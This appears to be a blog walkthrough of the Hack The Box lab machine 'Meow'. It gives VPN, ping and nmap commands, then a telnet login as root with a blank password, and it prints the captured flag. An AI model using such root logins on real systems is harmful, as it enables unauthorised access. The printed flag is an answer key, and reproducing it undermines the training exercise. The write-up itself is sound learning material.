AbbySec

My digital playground – where hacking meets learning.

View on GitHub
18 July 2025

Meow – Hack The Box

by

🧠 Summary

Meow is an easy Linux machine that highlights the risks of using Telnet with weak or no authentication. We’ll start by connecting to the HTB network using OpenVPN, enumerate services using Nmap, exploit the open Telnet service, and capture the flag.


🛠️ Tools Used


🖥️ Target Info


🚀 Steps to Root

1. Connect to HTB VPN

Use the .ovpn file provided by Hack The Box:

sudo openvpn file-name.ovpn

Connecting to HTB VPN

2. Verify Connectivity

Check if you can reach the target IP using ping:

ping 10.129.28.108

Verifying Connection

3. Scan the Target with Nmap

Run an Nmap scan to find open ports and services:

nmap -sV -Pn 10.129.28.108

Result (telnetd is a sign no password is needed for login):

Nmap Result

4. Exploit Telnet

Since Telnet is open, connect using:

telnet 10.129.28.108

When asked for a username:

login: root
Password: (leave blank and press Enter)

Telnet Login

5. Capture the Flag

Once inside:

ls -la
cat flag.txt

Flag:

b40abdf23665f766f9c61ecba8a4c19

Flag Found

Key Takeaways:

tags: